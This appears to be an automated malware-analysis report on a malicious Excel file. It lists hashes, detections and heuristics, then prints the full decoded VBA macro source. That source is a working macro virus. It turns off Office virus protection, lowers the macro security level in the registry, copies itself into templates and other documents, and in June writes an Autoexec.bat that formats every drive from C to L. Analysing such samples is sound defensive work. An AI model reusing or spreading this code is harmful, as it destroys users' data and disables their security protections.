Office (OLE) malware analysis — malicious · 97100470a9a303e6

MALICIOUS

Office (OLE)

40.0 KB Created: 2014-04-16 08:11:10 Authoring application: Microsoft Excel First seen: 2015-09-29

MD5: a17a662200cc96490c9f2e8f76ae2b80 SHA-1: ad1957c975b52f7ece82878664ed8422e1d9beb9 SHA-256: 97100470a9a303e69b93a1278ef2f4a5d83c1888d4d2883453e2a849d2265b44

328 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1553.005 Security Software Modification

The sample is an Excel file containing malicious VBA macros. The macros attempt to disable Office macro security features and replicate themselves across templates and documents. The presence of 'CreateObject' and 'GetObject' calls, along with self-replication and disabling of virus protection, indicates a trojan-like behavior designed to spread and evade detection. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Win.Trojan.Insert-9' further support its malicious nature.

Heuristics 7

ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Psycho-3
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
Options.VirusProtection = False
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set xlApp = CreateObject("Excel.Application")
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set WordObj = GetObject(, "Word.Application")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6006 bytes
SHA-256: `272ac38b03404c3e174fab032349512f9a5dc293516c6cca6392cbebb035eafa`
Detection ClamAV: Win.Trojan.Insert-9 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True 'HAHA! Private Sub Document_Open() On Error Resume Next Options.VirusProtection = False Options.ConfirmConversions = False Options.SaveNormalPrompt = False Application.ShowVisualBasicEditor = False If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& End If If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") <> "" Then System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1& End If For Each mItem In CommandBars("Tools").Controls If mItem.Caption = "选项(&O)..." Then mItem.Enabled = False End If If mItem.Caption = "模板和加载(&I)..." Then mItemmItem.Enabled = False End If If mItem.Caption = "自定义(&C)..." Then mItem.Enabled = False End If If mItem.Caption = "宏(&M)" Then mItem.Enabled = False End If Next mItem Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule Set TT = Templates(1).VBProject.VBComponents(1).CodeModule Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule If AD.Lines(1, 1) <> "'HAHA!" Then AD.DeleteLines 1, AD.CountOfLines AD.InsertLines 1, TT.Lines(1, TT.CountOfLines) If AD.Lines(1, 1) <> "'HAHA!" Then AD.InsertLines 1, NT.Lines(1, NT.CountOfLines) End If End If If NT.Lines(1, 1) <> "'HAHA!" Then NT.DeleteLines 1, NT.CountOfLines NT.InsertLines 1, AD.Lines(1, AD.CountOfLines) End If Set xlApp = CreateObject("Excel.Application") If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then Set Book1Obj = xlApp.Workbooks.Add Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines) Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1." Book1Obj.Close End If xlApp.Quit If Month(Now()) = 6 Then O = "C:\Autoexec.bat" Open O For Output As 1 Print #1, "@ echo off" Print #1, "format c: /autoexec/u" Print #1, "format d: /autoexec/u/select" Print #1, "format e: /autoexec/u/select" Print #1, "format f: /autoexec/u/select" Print #1, "format g: /autoexec/u/select" Print #1, "format h: /autoexec/u/select" Print #1, "format j: /autoexec/u/select" Print #1, "format l: /autoexec/u/select" Close End If End Sub Private Sub Document_New() Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule Set TT = Templates(1).VBProject.VBComponents(1).CodeModule Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule If AD.Lines(1, 1) <> "'HAHA!" Then AD.DeleteLines 1, AD.CountOfLines AD.InsertLines 1, TT.Lines(1, TT.CountOfLines) If AD.Lines(1, 1) <> "'HAHA!" Then AD.InsertLines 1, NT.Lines(1, NT.CountOfLines) End If End If If NT.Lines(1, 1) <> "'HAHA!" Then NT.DeleteLines 1, NT.CountOfLines NT.InsertLines 1, AD.Lines(1, AD.CountOfLines) End If End Sub Private Sub Workbook_Deactivate() On Error Resume Next Set AW = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule Set TW = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then Set xlApp = CreateObject("Excel.Application") Set Book1Obj = xlApp.Workbooks.Add Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, TW.Lines(1, TW.CountOfLines) Book1Obj.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False Book1Obj.Close xlApp.Quit Set WordObj = GetObject(, "Word.Application") If WordObj = "" Then Set WordObj = CreateObject("Word.Application") WQuit = True End If If WordObj.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") <> "" Then WordObj.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1& End If Set NT = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule WordObj.Options.SaveNormalPrompt = False If NT.Lines(1, 1) <> "'HAHA!" Then NT.DeleteLines 1, NT.CountOfLines NT.InsertLines 1, TW.Lines(1, TW.CountOfLines) End If Set NT = Nothing If WQuit = True Then WordObj.Quit End If If AW.Lines(1, 1) <> "'HAHA!" Then AW.InsertLines 1, TW.Lines(1, TW.CountOfLines) End If If Month(Now()) = 6 Then O = "C:\Autoexec.bat" Open O For Output As 1 Print #1, "@ echo off" Print #1, "format c: /autoexec/u" Print #1, "format d: /autoexec/u/select" Print #1, "format e: /autoexec/u/select" Print #1, "format f: /autoexec/u/select" Print #1, "format g: /autoexec/u/select" Print #1, "format h: /autoexec/u/select" Print #1, "format j: /autoexec/u/select" Print #1, "format l: /autoexec/u/select" Close End If End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.